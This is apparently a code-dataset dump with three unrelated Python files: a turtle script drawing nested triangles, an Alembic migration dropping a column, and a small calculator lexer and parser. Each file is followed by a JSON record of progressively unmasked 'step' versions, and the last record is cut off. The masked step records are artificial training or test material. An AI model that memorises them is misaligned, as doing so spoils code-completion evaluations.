import turtle def draw_triangle(brad): brad.color("blue", "green") brad.fill(True) brad.forward(300) brad.left(120) brad.forward(300) brad.left(120) brad.forward(300) brad.end_fill() #jdjjdd brad.color("blue", "white") brad.fill(True) brad.left(180) brad.forward(150) brad.right(60) brad.forward(150) brad.right(120) brad.forward(150) brad.right(120) brad.forward(150) brad.end_fill() brad.color("blue", "white") brad.fill(True) brad.left(180) brad.forward(75) brad.right(60) brad.forward(75) brad.right(120) brad.forward(75) brad.right(120) brad.forward(75) brad.end_fill() brad.right(60) brad.forward(75) brad.color("blue", "white") brad.fill(True) brad.left(120) brad.forward(75) brad.right(60) brad.forward(75) brad.right(120) brad.forward(75) brad.right(120) brad.forward(75) brad.end_fill() brad.right(60) brad.forward(75) brad.color("blue", "white") brad.fill(True) brad.left(120) brad.forward(75) brad.right(60) brad.forward(75) brad.right(120) brad.forward(75) brad.right(120) brad.forward(75) brad.end_fill() brad.color("blue", "white") brad.fill(True) brad.left(180) brad.forward(37.5) brad.right(60) brad.forward(37.5) brad.right(120) brad.forward(37.5) brad.right(120) brad.forward(37.5) brad.end_fill() brad.right(60) brad.forward(37.5) brad.color("blue", "white") brad.fill(True) brad.left(120) brad.forward(37.5) brad.right(60) brad.forward(37.5) brad.right(120) brad.forward(37.5) brad.right(120) brad.forward(37.5) brad.end_fill() brad.right(60) brad.forward(37.5) brad.color("blue", "white") brad.fill(True) brad.left(120) brad.forward(37.5) brad.right(60) brad.forward(37.5) brad.right(120) brad.forward(37.5) brad.right(120) brad.forward(37.5) brad.end_fill() brad.right(180) brad.forward(37.5) brad.left(60) brad.forward(75) brad.color("blue", "white") brad.fill(True) brad.left(60) brad.forward(37.5) brad.left(120) brad.forward(37.5) brad.left(120) brad.forward(37.5) brad.end_fill() brad.left(60) brad.forward(75) brad.color("blue", "white") brad.fill(True) brad.left(60) brad.forward(37.5) brad.left(120) brad.forward(37.5) brad.left(120) brad.forward(37.5) brad.end_fill() brad.left(180) brad.forward(37.5) brad.right(60) brad.forward(37.5) brad.left(120) brad.forward(37.5) brad.color("blue", "white") brad.fill(True) brad.right(60) brad.forward(37.5) brad.right(120) brad.forward(37.5) brad.right(120) brad.forward(37.5) brad.end_fill() brad.left(180) brad.forward(37.5) brad.right(-60) brad.forward(75) brad.color("blue", "white") brad.fill(True) brad.left(60) brad.forward(37.5) brad.left(120) brad.forward(37.5) brad.left(120) brad.forward(37.5) brad.end_fill() brad.right(-60) brad.forward(75) brad.color("blue", "white") brad.fill(True) brad.left(60) brad.forward(37.5) brad.left(120) brad.forward(37.5) brad.left(120) brad.forward(37.5) brad.end_fill() brad.right(-60) brad.forward(37.5) brad.left(120) brad.forward(75 + 37.5) brad.color("blue", "white") brad.fill(True) brad.left(120) brad.forward(37.5) brad.right(120) brad.forward(37.5) brad.right(120) brad.forward(37.5) brad.end_fill() def draw(): window = turtle.Screen() window.bgcolor("white") brad = turtle.Turtle() brad.shape("turtle") brad.color("blue") brad.speed(6) draw_triangle(brad) window.exitonclick() draw()
normal
{ "blob_id": "33f766bf12a82e25e36537d9d3b745b2444e1fd7", "index": 7042, "step-1": "<mask token>\n\n\ndef draw():\n window = turtle.Screen()\n window.bgcolor('white')\n brad = turtle.Turtle()\n brad.shape('turtle')\n brad.color('blue')\n brad.speed(6)\n draw_triangle(brad)\n window.exitonclick()\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\ndef draw_triangle(brad):\n brad.color('blue', 'green')\n brad.fill(True)\n brad.forward(300)\n brad.left(120)\n brad.forward(300)\n brad.left(120)\n brad.forward(300)\n brad.end_fill()\n brad.fill(True)\n brad.left(180)\n brad.forward(150)\n brad.right(60)\n brad.forward(150)\n brad.right(120)\n brad.forward(150)\n brad.right(120)\n brad.forward(150)\n brad.end_fill()\n brad.color('blue', 'white')\n brad.fill(True)\n brad.left(180)\n brad.forward(75)\n brad.right(60)\n brad.forward(75)\n brad.right(120)\n brad.forward(75)\n brad.right(120)\n brad.forward(75)\n brad.end_fill()\n brad.right(60)\n brad.forward(75)\n brad.color('blue', 'white')\n brad.fill(True)\n brad.left(120)\n brad.forward(75)\n brad.right(60)\n brad.forward(75)\n brad.right(120)\n brad.forward(75)\n brad.right(120)\n brad.forward(75)\n brad.end_fill()\n brad.right(60)\n brad.forward(75)\n brad.color('blue', 'white')\n brad.fill(True)\n brad.left(120)\n brad.forward(75)\n brad.right(60)\n brad.forward(75)\n brad.right(120)\n brad.forward(75)\n brad.right(120)\n brad.forward(75)\n brad.end_fill()\n brad.color('blue', 'white')\n brad.fill(True)\n brad.left(180)\n brad.forward(37.5)\n brad.right(60)\n brad.forward(37.5)\n brad.right(120)\n brad.forward(37.5)\n brad.right(120)\n brad.forward(37.5)\n brad.end_fill()\n brad.right(60)\n brad.forward(37.5)\n brad.color('blue', 'white')\n brad.fill(True)\n brad.left(120)\n brad.forward(37.5)\n brad.right(60)\n brad.forward(37.5)\n brad.right(120)\n brad.forward(37.5)\n brad.right(120)\n brad.forward(37.5)\n brad.end_fill()\n brad.right(60)\n brad.forward(37.5)\n brad.color('blue', 'white')\n brad.fill(True)\n brad.left(120)\n brad.forward(37.5)\n brad.right(60)\n brad.forward(37.5)\n brad.right(120)\n brad.forward(37.5)\n brad.right(120)\n brad.forward(37.5)\n brad.end_fill()\n brad.right(180)\n brad.forward(37.5)\n brad.left(60)\n brad.forward(75)\n brad.color('blue', 'white')\n brad.fill(True)\n brad.left(60)\n brad.forward(37.5)\n brad.left(120)\n brad.forward(37.5)\n brad.left(120)\n brad.forward(37.5)\n brad.end_fill()\n brad.left(60)\n brad.forward(75)\n brad.color('blue', 'white')\n brad.fill(True)\n brad.left(60)\n brad.forward(37.5)\n brad.left(120)\n brad.forward(37.5)\n brad.left(120)\n brad.forward(37.5)\n brad.end_fill()\n brad.left(180)\n brad.forward(37.5)\n brad.right(60)\n brad.forward(37.5)\n brad.left(120)\n brad.forward(37.5)\n brad.color('blue', 'white')\n brad.fill(True)\n brad.right(60)\n brad.forward(37.5)\n brad.right(120)\n brad.forward(37.5)\n brad.right(120)\n brad.forward(37.5)\n brad.end_fill()\n brad.left(180)\n brad.forward(37.5)\n brad.right(-60)\n brad.forward(75)\n brad.color('blue', 'white')\n brad.fill(True)\n brad.left(60)\n brad.forward(37.5)\n brad.left(120)\n brad.forward(37.5)\n brad.left(120)\n brad.forward(37.5)\n brad.end_fill()\n brad.right(-60)\n brad.forward(75)\n brad.color('blue', 'white')\n brad.fill(True)\n brad.left(60)\n brad.forward(37.5)\n brad.left(120)\n brad.forward(37.5)\n brad.left(120)\n brad.forward(37.5)\n brad.end_fill()\n brad.right(-60)\n brad.forward(37.5)\n brad.left(120)\n brad.forward(75 + 37.5)\n brad.color('blue', 'white')\n brad.fill(True)\n brad.left(120)\n brad.forward(37.5)\n brad.right(120)\n brad.forward(37.5)\n brad.right(120)\n brad.forward(37.5)\n brad.end_fill()\n\n\ndef draw():\n window = turtle.Screen()\n window.bgcolor('white')\n brad = turtle.Turtle()\n brad.shape('turtle')\n brad.color('blue')\n brad.speed(6)\n draw_triangle(brad)\n window.exitonclick()\n\n\n<mask token>\n", "step-3": "<mask token>\n\n\ndef draw_triangle(brad):\n brad.color('blue', 'green')\n brad.fill(True)\n brad.forward(300)\n brad.left(120)\n brad.forward(300)\n brad.left(120)\n brad.forward(300)\n brad.end_fill()\n brad.fill(True)\n brad.left(180)\n brad.forward(150)\n brad.right(60)\n brad.forward(150)\n brad.right(120)\n brad.forward(150)\n brad.right(120)\n brad.forward(150)\n brad.end_fill()\n brad.color('blue', 'white')\n brad.fill(True)\n brad.left(180)\n brad.forward(75)\n brad.right(60)\n brad.forward(75)\n brad.right(120)\n brad.forward(75)\n brad.right(120)\n brad.forward(75)\n brad.end_fill()\n brad.right(60)\n brad.forward(75)\n brad.color('blue', 'white')\n brad.fill(True)\n brad.left(120)\n brad.forward(75)\n brad.right(60)\n brad.forward(75)\n brad.right(120)\n brad.forward(75)\n brad.right(120)\n brad.forward(75)\n brad.end_fill()\n brad.right(60)\n brad.forward(75)\n brad.color('blue', 'white')\n brad.fill(True)\n brad.left(120)\n brad.forward(75)\n brad.right(60)\n brad.forward(75)\n brad.right(120)\n brad.forward(75)\n brad.right(120)\n brad.forward(75)\n brad.end_fill()\n brad.color('blue', 'white')\n brad.fill(True)\n brad.left(180)\n brad.forward(37.5)\n brad.right(60)\n brad.forward(37.5)\n brad.right(120)\n brad.forward(37.5)\n brad.right(120)\n brad.forward(37.5)\n brad.end_fill()\n brad.right(60)\n brad.forward(37.5)\n brad.color('blue', 'white')\n brad.fill(True)\n brad.left(120)\n brad.forward(37.5)\n brad.right(60)\n brad.forward(37.5)\n brad.right(120)\n brad.forward(37.5)\n brad.right(120)\n brad.forward(37.5)\n brad.end_fill()\n brad.right(60)\n brad.forward(37.5)\n brad.color('blue', 'white')\n brad.fill(True)\n brad.left(120)\n brad.forward(37.5)\n brad.right(60)\n brad.forward(37.5)\n brad.right(120)\n brad.forward(37.5)\n brad.right(120)\n brad.forward(37.5)\n brad.end_fill()\n brad.right(180)\n brad.forward(37.5)\n brad.left(60)\n brad.forward(75)\n brad.color('blue', 'white')\n brad.fill(True)\n brad.left(60)\n brad.forward(37.5)\n brad.left(120)\n brad.forward(37.5)\n brad.left(120)\n brad.forward(37.5)\n brad.end_fill()\n brad.left(60)\n brad.forward(75)\n brad.color('blue', 'white')\n brad.fill(True)\n brad.left(60)\n brad.forward(37.5)\n brad.left(120)\n brad.forward(37.5)\n brad.left(120)\n brad.forward(37.5)\n brad.end_fill()\n brad.left(180)\n brad.forward(37.5)\n brad.right(60)\n brad.forward(37.5)\n brad.left(120)\n brad.forward(37.5)\n brad.color('blue', 'white')\n brad.fill(True)\n brad.right(60)\n brad.forward(37.5)\n brad.right(120)\n brad.forward(37.5)\n brad.right(120)\n brad.forward(37.5)\n brad.end_fill()\n brad.left(180)\n brad.forward(37.5)\n brad.right(-60)\n brad.forward(75)\n brad.color('blue', 'white')\n brad.fill(True)\n brad.left(60)\n brad.forward(37.5)\n brad.left(120)\n brad.forward(37.5)\n brad.left(120)\n brad.forward(37.5)\n brad.end_fill()\n brad.right(-60)\n brad.forward(75)\n brad.color('blue', 'white')\n brad.fill(True)\n brad.left(60)\n brad.forward(37.5)\n brad.left(120)\n brad.forward(37.5)\n brad.left(120)\n brad.forward(37.5)\n brad.end_fill()\n brad.right(-60)\n brad.forward(37.5)\n brad.left(120)\n brad.forward(75 + 37.5)\n brad.color('blue', 'white')\n brad.fill(True)\n brad.left(120)\n brad.forward(37.5)\n brad.right(120)\n brad.forward(37.5)\n brad.right(120)\n brad.forward(37.5)\n brad.end_fill()\n\n\ndef draw():\n window = turtle.Screen()\n window.bgcolor('white')\n brad = turtle.Turtle()\n brad.shape('turtle')\n brad.color('blue')\n brad.speed(6)\n draw_triangle(brad)\n window.exitonclick()\n\n\ndraw()\n", "step-4": "import turtle\n\n\ndef draw_triangle(brad):\n brad.color('blue', 'green')\n brad.fill(True)\n brad.forward(300)\n brad.left(120)\n brad.forward(300)\n brad.left(120)\n brad.forward(300)\n brad.end_fill()\n brad.fill(True)\n brad.left(180)\n brad.forward(150)\n brad.right(60)\n brad.forward(150)\n brad.right(120)\n brad.forward(150)\n brad.right(120)\n brad.forward(150)\n brad.end_fill()\n brad.color('blue', 'white')\n brad.fill(True)\n brad.left(180)\n brad.forward(75)\n brad.right(60)\n brad.forward(75)\n brad.right(120)\n brad.forward(75)\n brad.right(120)\n brad.forward(75)\n brad.end_fill()\n brad.right(60)\n brad.forward(75)\n brad.color('blue', 'white')\n brad.fill(True)\n brad.left(120)\n brad.forward(75)\n brad.right(60)\n brad.forward(75)\n brad.right(120)\n brad.forward(75)\n brad.right(120)\n brad.forward(75)\n brad.end_fill()\n brad.right(60)\n brad.forward(75)\n brad.color('blue', 'white')\n brad.fill(True)\n brad.left(120)\n brad.forward(75)\n brad.right(60)\n brad.forward(75)\n brad.right(120)\n brad.forward(75)\n brad.right(120)\n brad.forward(75)\n brad.end_fill()\n brad.color('blue', 'white')\n brad.fill(True)\n brad.left(180)\n brad.forward(37.5)\n brad.right(60)\n brad.forward(37.5)\n brad.right(120)\n brad.forward(37.5)\n brad.right(120)\n brad.forward(37.5)\n brad.end_fill()\n brad.right(60)\n brad.forward(37.5)\n brad.color('blue', 'white')\n brad.fill(True)\n brad.left(120)\n brad.forward(37.5)\n brad.right(60)\n brad.forward(37.5)\n brad.right(120)\n brad.forward(37.5)\n brad.right(120)\n brad.forward(37.5)\n brad.end_fill()\n brad.right(60)\n brad.forward(37.5)\n brad.color('blue', 'white')\n brad.fill(True)\n brad.left(120)\n brad.forward(37.5)\n brad.right(60)\n brad.forward(37.5)\n brad.right(120)\n brad.forward(37.5)\n brad.right(120)\n brad.forward(37.5)\n brad.end_fill()\n brad.right(180)\n brad.forward(37.5)\n brad.left(60)\n brad.forward(75)\n brad.color('blue', 'white')\n brad.fill(True)\n brad.left(60)\n brad.forward(37.5)\n brad.left(120)\n brad.forward(37.5)\n brad.left(120)\n brad.forward(37.5)\n brad.end_fill()\n brad.left(60)\n brad.forward(75)\n brad.color('blue', 'white')\n brad.fill(True)\n brad.left(60)\n brad.forward(37.5)\n brad.left(120)\n brad.forward(37.5)\n brad.left(120)\n brad.forward(37.5)\n brad.end_fill()\n brad.left(180)\n brad.forward(37.5)\n brad.right(60)\n brad.forward(37.5)\n brad.left(120)\n brad.forward(37.5)\n brad.color('blue', 'white')\n brad.fill(True)\n brad.right(60)\n brad.forward(37.5)\n brad.right(120)\n brad.forward(37.5)\n brad.right(120)\n brad.forward(37.5)\n brad.end_fill()\n brad.left(180)\n brad.forward(37.5)\n brad.right(-60)\n brad.forward(75)\n brad.color('blue', 'white')\n brad.fill(True)\n brad.left(60)\n brad.forward(37.5)\n brad.left(120)\n brad.forward(37.5)\n brad.left(120)\n brad.forward(37.5)\n brad.end_fill()\n brad.right(-60)\n brad.forward(75)\n brad.color('blue', 'white')\n brad.fill(True)\n brad.left(60)\n brad.forward(37.5)\n brad.left(120)\n brad.forward(37.5)\n brad.left(120)\n brad.forward(37.5)\n brad.end_fill()\n brad.right(-60)\n brad.forward(37.5)\n brad.left(120)\n brad.forward(75 + 37.5)\n brad.color('blue', 'white')\n brad.fill(True)\n brad.left(120)\n brad.forward(37.5)\n brad.right(120)\n brad.forward(37.5)\n brad.right(120)\n brad.forward(37.5)\n brad.end_fill()\n\n\ndef draw():\n window = turtle.Screen()\n window.bgcolor('white')\n brad = turtle.Turtle()\n brad.shape('turtle')\n brad.color('blue')\n brad.speed(6)\n draw_triangle(brad)\n window.exitonclick()\n\n\ndraw()\n", "step-5": "import turtle\ndef draw_triangle(brad):\n brad.color(\"blue\", \"green\")\n brad.fill(True)\n\n brad.forward(300)\n brad.left(120)\n brad.forward(300)\n brad.left(120)\n brad.forward(300)\n brad.end_fill()\n#jdjjdd brad.color(\"blue\", \"white\")\n brad.fill(True)\n brad.left(180)\n brad.forward(150)\n brad.right(60)\n brad.forward(150)\n brad.right(120)\n brad.forward(150)\n brad.right(120)\n brad.forward(150)\n brad.end_fill()\n\n brad.color(\"blue\", \"white\")\n brad.fill(True)\n brad.left(180)\n brad.forward(75)\n brad.right(60)\n brad.forward(75)\n brad.right(120)\n brad.forward(75)\n brad.right(120)\n brad.forward(75)\n brad.end_fill()\n\n brad.right(60)\n brad.forward(75)\n\n brad.color(\"blue\", \"white\")\n brad.fill(True)\n brad.left(120)\n brad.forward(75)\n brad.right(60)\n brad.forward(75)\n brad.right(120)\n brad.forward(75)\n brad.right(120)\n brad.forward(75)\n brad.end_fill()\n\n brad.right(60)\n brad.forward(75)\n\n brad.color(\"blue\", \"white\")\n brad.fill(True)\n brad.left(120)\n brad.forward(75)\n brad.right(60)\n brad.forward(75)\n brad.right(120)\n brad.forward(75)\n brad.right(120)\n brad.forward(75)\n brad.end_fill()\n\n\n brad.color(\"blue\", \"white\")\n brad.fill(True)\n brad.left(180)\n brad.forward(37.5)\n brad.right(60)\n brad.forward(37.5)\n brad.right(120)\n brad.forward(37.5)\n brad.right(120)\n brad.forward(37.5)\n brad.end_fill()\n\n brad.right(60)\n brad.forward(37.5)\n\n brad.color(\"blue\", \"white\")\n brad.fill(True)\n brad.left(120)\n brad.forward(37.5)\n brad.right(60)\n brad.forward(37.5)\n brad.right(120)\n brad.forward(37.5)\n brad.right(120)\n brad.forward(37.5)\n brad.end_fill()\n\n brad.right(60)\n brad.forward(37.5)\n\n brad.color(\"blue\", \"white\")\n brad.fill(True)\n brad.left(120)\n brad.forward(37.5)\n brad.right(60)\n brad.forward(37.5)\n brad.right(120)\n brad.forward(37.5)\n brad.right(120)\n brad.forward(37.5)\n brad.end_fill()\n\n brad.right(180)\n brad.forward(37.5)\n brad.left(60)\n brad.forward(75)\n\n brad.color(\"blue\", \"white\")\n brad.fill(True)\n brad.left(60)\n brad.forward(37.5)\n brad.left(120)\n brad.forward(37.5)\n brad.left(120)\n brad.forward(37.5)\n brad.end_fill()\n\n brad.left(60)\n brad.forward(75)\n\n brad.color(\"blue\", \"white\")\n brad.fill(True)\n brad.left(60)\n brad.forward(37.5)\n brad.left(120)\n brad.forward(37.5)\n brad.left(120)\n brad.forward(37.5)\n brad.end_fill()\n\n brad.left(180)\n brad.forward(37.5)\n\n brad.right(60)\n brad.forward(37.5)\n\n brad.left(120)\n brad.forward(37.5)\n brad.color(\"blue\", \"white\")\n brad.fill(True)\n brad.right(60)\n brad.forward(37.5)\n brad.right(120)\n brad.forward(37.5)\n brad.right(120)\n brad.forward(37.5)\n brad.end_fill()\n\n brad.left(180)\n brad.forward(37.5)\n brad.right(-60)\n brad.forward(75)\n\n brad.color(\"blue\", \"white\")\n brad.fill(True)\n brad.left(60)\n brad.forward(37.5)\n brad.left(120)\n brad.forward(37.5)\n brad.left(120)\n brad.forward(37.5)\n brad.end_fill()\n\n brad.right(-60)\n brad.forward(75)\n\n brad.color(\"blue\", \"white\")\n brad.fill(True)\n brad.left(60)\n brad.forward(37.5)\n brad.left(120)\n brad.forward(37.5)\n brad.left(120)\n brad.forward(37.5)\n brad.end_fill()\n\n brad.right(-60)\n brad.forward(37.5)\n\n brad.left(120)\n brad.forward(75 + 37.5)\n\n brad.color(\"blue\", \"white\")\n brad.fill(True)\n brad.left(120)\n brad.forward(37.5)\n brad.right(120)\n brad.forward(37.5)\n brad.right(120)\n brad.forward(37.5)\n brad.end_fill()\n\n\n\n\ndef draw():\n window = turtle.Screen()\n window.bgcolor(\"white\")\n brad = turtle.Turtle()\n brad.shape(\"turtle\")\n brad.color(\"blue\")\n brad.speed(6)\n draw_triangle(brad)\n window.exitonclick()\ndraw()\n", "step-ids": [ 1, 2, 3, 4, 5 ] }
[ 1, 2, 3, 4, 5 ]
""" Remove tool_consumer_info_product_family_code from GradingInfo. Revision ID: 106d94be7705 Revises: 973c9358b616 Create Date: 2023-07-06 11:23:10.850486 """ import sqlalchemy as sa from alembic import op # revision identifiers, used by Alembic. revision = "106d94be7705" down_revision = "973c9358b616" def upgrade(): op.drop_column("lis_result_sourcedid", "tool_consumer_info_product_family_code") def downgrade(): op.add_column( "lis_result_sourcedid", sa.Column( "tool_consumer_info_product_family_code", sa.TEXT(), autoincrement=False, nullable=True, ), )
normal
{ "blob_id": "46d85a3babab4b18f4e0e0384f254f6105cf691d", "index": 1490, "step-1": "<mask token>\n\n\ndef upgrade():\n op.drop_column('lis_result_sourcedid',\n 'tool_consumer_info_product_family_code')\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\ndef upgrade():\n op.drop_column('lis_result_sourcedid',\n 'tool_consumer_info_product_family_code')\n\n\ndef downgrade():\n op.add_column('lis_result_sourcedid', sa.Column(\n 'tool_consumer_info_product_family_code', sa.TEXT(), autoincrement=\n False, nullable=True))\n", "step-3": "<mask token>\nrevision = '106d94be7705'\ndown_revision = '973c9358b616'\n\n\ndef upgrade():\n op.drop_column('lis_result_sourcedid',\n 'tool_consumer_info_product_family_code')\n\n\ndef downgrade():\n op.add_column('lis_result_sourcedid', sa.Column(\n 'tool_consumer_info_product_family_code', sa.TEXT(), autoincrement=\n False, nullable=True))\n", "step-4": "<mask token>\nimport sqlalchemy as sa\nfrom alembic import op\nrevision = '106d94be7705'\ndown_revision = '973c9358b616'\n\n\ndef upgrade():\n op.drop_column('lis_result_sourcedid',\n 'tool_consumer_info_product_family_code')\n\n\ndef downgrade():\n op.add_column('lis_result_sourcedid', sa.Column(\n 'tool_consumer_info_product_family_code', sa.TEXT(), autoincrement=\n False, nullable=True))\n", "step-5": "\"\"\"\nRemove tool_consumer_info_product_family_code from GradingInfo.\n\nRevision ID: 106d94be7705\nRevises: 973c9358b616\nCreate Date: 2023-07-06 11:23:10.850486\n\n\"\"\"\nimport sqlalchemy as sa\nfrom alembic import op\n\n# revision identifiers, used by Alembic.\nrevision = \"106d94be7705\"\ndown_revision = \"973c9358b616\"\n\n\ndef upgrade():\n op.drop_column(\"lis_result_sourcedid\", \"tool_consumer_info_product_family_code\")\n\n\ndef downgrade():\n op.add_column(\n \"lis_result_sourcedid\",\n sa.Column(\n \"tool_consumer_info_product_family_code\",\n sa.TEXT(),\n autoincrement=False,\n nullable=True,\n ),\n )\n", "step-ids": [ 1, 2, 3, 4, 5 ] }
[ 1, 2, 3, 4, 5 ]
from interpreter import Interpreter from pretty_print import PrettyPrint from ast import Operator, Operation, Element class Token: operator = False empty = False def __init__(self, token): self.token = token if token == '+': self.operator = True elif token == '-': self.operator = True elif token == '*': self.operator = True elif token == '/': self.operator = True elif token == '': self.empty = True else: self.token = int(self.token) class Lexer: def __init__(self, stream): self.stream = stream def get_token(self): next_space = self.stream.find(' ') if next_space == -1: token = Token(self.stream) self.stream = '' return token token = self.stream[:next_space] self.stream = self.stream[next_space + 1:] return Token(token) class Parser: def __init__(self, token_stream): self.token_stream = token_stream def parse(self, ast = None): if ast is None: first_token = self.token_stream.get_token() ast = Element(first_token.token) operator = self.token_stream.get_token() if operator.empty: return ast if operator.operator: return self.parse_operator(ast, operator) def parse_operator(self, left_ast, operator): right_token = self.token_stream.get_token() return self.parse( Operation( left_ast, Element(right_token.token), Operator(operator.token) ) ) def test_ast(): calcul_visitor = Interpreter() op = Operation(Element(7), Element(3), Operator('+')) Operation(op, op, Operator('+')).accept(calcul_visitor) calcul_visitor.print_result() def test_lexer(): string = '1 + 3 + 4 + 50 + 1 + 0' lexer = Lexer(string) token = lexer.get_token() while (not token.empty): print(token.token) token = lexer.get_token() def test_parser(): parser = Parser(Lexer('1 + 2 + 3')) ast = parser.parse() ast.accept(PrettyPrint()) print() while True: try: _in = input('string to calculate:') except EOFError: print() break ast = Parser(Lexer(_in)).parse() ast.accept(PrettyPrint()) calc = Interpreter() ast.accept(calc) print(' = ', end='') calc.print_result()
normal
{ "blob_id": "0d6c1e74a274b3e8ad9c63ecaa125f79976db9b4", "index": 1734, "step-1": "<mask token>\n\n\nclass Token:\n operator = False\n empty = False\n\n def __init__(self, token):\n self.token = token\n if token == '+':\n self.operator = True\n elif token == '-':\n self.operator = True\n elif token == '*':\n self.operator = True\n elif token == '/':\n self.operator = True\n elif token == '':\n self.empty = True\n else:\n self.token = int(self.token)\n\n\nclass Lexer:\n\n def __init__(self, stream):\n self.stream = stream\n\n def get_token(self):\n next_space = self.stream.find(' ')\n if next_space == -1:\n token = Token(self.stream)\n self.stream = ''\n return token\n token = self.stream[:next_space]\n self.stream = self.stream[next_space + 1:]\n return Token(token)\n\n\nclass Parser:\n\n def __init__(self, token_stream):\n self.token_stream = token_stream\n\n def parse(self, ast=None):\n if ast is None:\n first_token = self.token_stream.get_token()\n ast = Element(first_token.token)\n operator = self.token_stream.get_token()\n if operator.empty:\n return ast\n if operator.operator:\n return self.parse_operator(ast, operator)\n\n def parse_operator(self, left_ast, operator):\n right_token = self.token_stream.get_token()\n return self.parse(Operation(left_ast, Element(right_token.token),\n Operator(operator.token)))\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\nclass Token:\n operator = False\n empty = False\n\n def __init__(self, token):\n self.token = token\n if token == '+':\n self.operator = True\n elif token == '-':\n self.operator = True\n elif token == '*':\n self.operator = True\n elif token == '/':\n self.operator = True\n elif token == '':\n self.empty = True\n else:\n self.token = int(self.token)\n\n\nclass Lexer:\n\n def __init__(self, stream):\n self.stream = stream\n\n def get_token(self):\n next_space = self.stream.find(' ')\n if next_space == -1:\n token = Token(self.stream)\n self.stream = ''\n return token\n token = self.stream[:next_space]\n self.stream = self.stream[next_space + 1:]\n return Token(token)\n\n\nclass Parser:\n\n def __init__(self, token_stream):\n self.token_stream = token_stream\n\n def parse(self, ast=None):\n if ast is None:\n first_token = self.token_stream.get_token()\n ast = Element(first_token.token)\n operator = self.token_stream.get_token()\n if operator.empty:\n return ast\n if operator.operator:\n return self.parse_operator(ast, operator)\n\n def parse_operator(self, left_ast, operator):\n right_token = self.token_stream.get_token()\n return self.parse(Operation(left_ast, Element(right_token.token),\n Operator(operator.token)))\n\n\ndef test_ast():\n calcul_visitor = Interpreter()\n op = Operation(Element(7), Element(3), Operator('+'))\n Operation(op, op, Operator('+')).accept(calcul_visitor)\n calcul_visitor.print_result()\n\n\n<mask token>\n", "step-3": "<mask token>\n\n\nclass Token:\n operator = False\n empty = False\n\n def __init__(self, token):\n self.token = token\n if token == '+':\n self.operator = True\n elif token == '-':\n self.operator = True\n elif token == '*':\n self.operator = True\n elif token == '/':\n self.operator = True\n elif token == '':\n self.empty = True\n else:\n self.token = int(self.token)\n\n\nclass Lexer:\n\n def __init__(self, stream):\n self.stream = stream\n\n def get_token(self):\n next_space = self.stream.find(' ')\n if next_space == -1:\n token = Token(self.stream)\n self.stream = ''\n return token\n token = self.stream[:next_space]\n self.stream = self.stream[next_space + 1:]\n return Token(token)\n\n\nclass Parser:\n\n def __init__(self, token_stream):\n self.token_stream = token_stream\n\n def parse(self, ast=None):\n if ast is None:\n first_token = self.token_stream.get_token()\n ast = Element(first_token.token)\n operator = self.token_stream.get_token()\n if operator.empty:\n return ast\n if operator.operator:\n return self.parse_operator(ast, operator)\n\n def parse_operator(self, left_ast, operator):\n right_token = self.token_stream.get_token()\n return self.parse(Operation(left_ast, Element(right_token.token),\n Operator(operator.token)))\n\n\ndef test_ast():\n calcul_visitor = Interpreter()\n op = Operation(Element(7), Element(3), Operator('+'))\n Operation(op, op, Operator('+')).accept(calcul_visitor)\n calcul_visitor.print_result()\n\n\ndef test_lexer():\n string = '1 + 3 + 4 + 50 + 1 + 0'\n lexer = Lexer(string)\n token = lexer.get_token()\n while not token.empty:\n print(token.token)\n token = lexer.get_token()\n\n\ndef test_parser():\n parser = Parser(Lexer('1 + 2 + 3'))\n ast = parser.parse()\n ast.accept(PrettyPrint())\n print()\n\n\n<mask token>\n", "step-4": "from interpreter import Interpreter\nfrom pretty_print import PrettyPrint\nfrom ast import Operator, Operation, Element\n\n\nclass Token:\n operator = False\n empty = False\n\n def __init__(self, token):\n self.token = token\n if token == '+':\n self.operator = True\n elif token == '-':\n self.operator = True\n elif token == '*':\n self.operator = True\n elif token == '/':\n self.operator = True\n elif token == '':\n self.empty = True\n else:\n self.token = int(self.token)\n\n\nclass Lexer:\n\n def __init__(self, stream):\n self.stream = stream\n\n def get_token(self):\n next_space = self.stream.find(' ')\n if next_space == -1:\n token = Token(self.stream)\n self.stream = ''\n return token\n token = self.stream[:next_space]\n self.stream = self.stream[next_space + 1:]\n return Token(token)\n\n\nclass Parser:\n\n def __init__(self, token_stream):\n self.token_stream = token_stream\n\n def parse(self, ast=None):\n if ast is None:\n first_token = self.token_stream.get_token()\n ast = Element(first_token.token)\n operator = self.token_stream.get_token()\n if operator.empty:\n return ast\n if operator.operator:\n return self.parse_operator(ast, operator)\n\n def parse_operator(self, left_ast, operator):\n right_token = self.token_stream.get_token()\n return self.parse(Operation(left_ast, Element(right_token.token),\n Operator(operator.token)))\n\n\ndef test_ast():\n calcul_visitor = Interpreter()\n op = Operation(Element(7), Element(3), Operator('+'))\n Operation(op, op, Operator('+')).accept(calcul_visitor)\n calcul_visitor.print_result()\n\n\ndef test_lexer():\n string = '1 + 3 + 4 + 50 + 1 + 0'\n lexer = Lexer(string)\n token = lexer.get_token()\n while not token.empty:\n print(token.token)\n token = lexer.get_token()\n\n\ndef test_parser():\n parser = Parser(Lexer('1 + 2 + 3'))\n ast = parser.parse()\n ast.accept(PrettyPrint())\n print()\n\n\nwhile True:\n try:\n _in = input('string to calculate:')\n except EOFError:\n print()\n break\n ast = Parser(Lexer(_in)).parse()\n ast.accept(PrettyPrint())\n calc = Interpreter()\n ast.accept(calc)\n print(' = ', end='')\n calc.print_result()\n", "step-5": "from interpreter import Interpreter\nfrom pretty_print import PrettyPrint\nfrom ast import Operator, Operation, Element\n\nclass Token:\n operator = False\n empty = False\n def __init__(self, token):\n self.token = token\n if token == '+':\n self.operator = True\n elif token == '-':\n self.operator = True\n elif token == '*':\n self.operator = True\n elif token == '/':\n self.operator = True\n elif token == '':\n self.empty = True\n else:\n self.token = int(self.token)\n\n\nclass Lexer:\n def __init__(self, stream):\n self.stream = stream\n\n def get_token(self):\n next_space = self.stream.find(' ')\n if next_space == -1:\n token = Token(self.stream)\n self.stream = ''\n return token\n token = self.stream[:next_space]\n self.stream = self.stream[next_space + 1:]\n return Token(token)\n\n\nclass Parser:\n def __init__(self, token_stream):\n self.token_stream = token_stream\n\n def parse(self, ast = None):\n if ast is None:\n first_token = self.token_stream.get_token()\n ast = Element(first_token.token)\n operator = self.token_stream.get_token()\n if operator.empty:\n return ast\n if operator.operator:\n return self.parse_operator(ast, operator)\n\n def parse_operator(self, left_ast, operator):\n right_token = self.token_stream.get_token()\n return self.parse(\n Operation(\n left_ast,\n 